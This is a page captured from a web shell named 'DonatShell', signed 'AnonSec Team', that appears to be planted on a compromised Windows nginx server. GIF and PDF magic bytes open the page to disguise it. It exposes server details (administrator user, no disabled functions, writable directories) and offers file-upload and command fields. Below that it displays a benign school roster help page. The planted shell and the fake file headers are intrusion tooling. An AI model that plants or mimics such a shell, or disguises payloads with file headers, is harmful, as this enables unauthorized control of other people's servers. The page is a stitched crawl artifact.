GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/_Archive/ClassRosterCopyExample.php
<?
// ClassRosterCopyExample.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
//$skipAuthentication = true; // Uncomment for after section authentication.
include('application.phpinc');
$headTitle = 'Class Roster Copy Example';
doctype(__FILE__);
?>
<head>
<title><?=$headTitle?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/CST.css" rel="stylesheet" type="text/css">
<?
if (isset($css) && $css != '') {
	$cssFile = split(",", $css);
	foreach ( $cssFile as $thisCssFile) {
		echo '<link href="'.$_SESSION['HTTP_ROOT'].'/css/'.$thisCssFile.'.css" rel="stylesheet" type="text/css">'."\n";
	}
}
?>
<?
if (isset($js) && $js != '') {
	$jsFile = split(",", $js);
	foreach ( $jsFile as $thisJavascriptFile) {
		echo '<script language="JavaScript1.2" src="'.$_SESSION['HTTP_ROOT'].'/js/'.$thisJavascriptFile.'.js"></script>'."\n";
	}
}
?>
<!--[if IE]><style type="text/css">@import "/css/CST_IE_fix.css";</style><![endif]-->
</head>
<body onClick="window.close();">
<div class="center" style="margin:0 auto; width:800px;">
	<div class="left">
	Begin your copy by clicking at the beginning of the first student's Tech Id and dragging the mouse to the end of the last Advisor's name.
	<br>
	Then right-click and select <strong><u>C</u>opy</strong> from the context menu.
	</div>
	<img src="ClassRosterCopyExample.png" alt="Class Roster Copy Example">
	Click on this window to close it.
</div>
</body>
</html>
<?
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team